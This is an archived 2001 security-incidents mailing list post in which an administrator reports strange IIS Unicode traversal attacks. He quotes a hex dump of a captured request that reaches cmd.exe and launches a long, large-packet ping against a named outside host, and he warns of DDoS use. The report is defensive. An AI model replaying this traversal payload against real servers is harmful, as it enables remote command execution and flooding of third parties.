Security Incidents mailing list archives
Strage IIS UNicode
From: "Yoann LeCorvic" <Yoann.LeCorvic () infrasoft-civil com>
Date: Fri, 25 May 2001 09:22:14 +0000
Hi In the past monthe I get quite a few of IIS Unicode attacks, but a bi strange. Thecome from a bit everywhere, and are very similar. It trie to use the vulnerability do ping other machines. 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25 c0%af..%c0%af..% 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25 c0%af..%c0%af..% 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25 c0%af..%c0%af..% 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2F 77 69 c0%af..%c0%af/wi 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 nnt/system32/cmd 2E 65 78 65 3F 2F 63 25 32 30 70 69 6E 67 25 32 .exe?/c%20ping%2 30 2D 76 25 32 30 74 69 6D 65 73 74 61 6D 70 2D 0-v%20timestamp- 72 65 70 6C 79 25 32 30 2D 6E 25 32 30 39 39 39 reply%20-n%20999 39 39 39 39 39 39 39 39 39 39 39 25 32 30 2D 6C 99999999999%20-l 25 32 30 36 35 35 30 30 25 32 30 2D 77 25 32 30 %2065500%20-w%20 30 25 32 30 64 75 6E 67 65 6F 6E 66 79 72 65 2E 0%20dungeonfyre. 66 78 63 68 61 74 2E 6E 65 74 0D 0A fxchat.net.. This could be used for DDOS as the number of packets is high, as well as the size ? Watch out... Yoann Le Corvic - Internet Administrator Email : yoann.lecorvic () infrasoft-civil com Web : http://www.infrasoft-civil.com/ ======================== Infrasoft Ltd North Heath Lane Horsham, West Sussex RH12 5QE United Kingdom Tel : +44 (0)1403 259511 Fax : +44 (0)1403 217728 ********************************************************************** The information contained in this message or any of its attachments is confidential and is intended for the exclusive use of the addressee. The information may also be legally privileged. The views expressed may not be those of Infrasoft, but the personal views of the originator. If you are not the addressee, any disclosure, reproduction, distribution or other dissemination or use of this communication is strictly prohibited. If you have received this message in error, please contact : postmaster () infrasoft-civil com and delete this message. **********************************************************************"
Current thread:
- Strage IIS UNicode Yoann LeCorvic (May 25)